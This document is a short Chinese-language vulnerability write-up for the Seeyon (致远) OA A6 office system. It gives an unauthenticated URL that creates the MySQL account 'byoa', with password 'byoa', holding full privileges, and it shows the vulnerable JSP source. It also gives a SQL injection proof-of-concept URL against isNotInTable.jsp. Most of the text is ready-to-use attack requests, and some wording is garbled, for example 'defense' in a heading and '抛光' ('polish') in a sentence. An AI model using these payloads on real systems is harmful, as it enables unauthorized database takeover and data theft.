005-致远OA A6 重置数据库账号密码漏洞.md
1.42 KB / 2021-07-17 00:01:28
# 致远OA A6 重置数据库账号密码漏洞
### 一、漏洞简介
### 二、漏洞影响
致远OA A6
### 三、复现过程
重置数据库账号密码防御
```bash
http://url/yyoa/ext/byoa/start.jsp
```
该文件的代码为:
```java
<% Connection conn = null; PreparedStatement pstmt = null; String sql = "create user byoa IDENTIFIED by 'byoa'"; try { conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection(); pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); sql = "grant all on *.* to byoa"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "update mysql.user set password=password('byoa') where user='byoa'"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "flush privileges"; pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); pstmt.close(); //conn.close(); } catch (Exception ex) { out.println(ex.getMessage()); }%>
```
可以抛光该文件没有验证任何权限,便进行了重置数据库用户byoa的密码为:byoa
**mysql + jsp注射**
```bash
http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp
```
poc
```bash
http://url/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}
```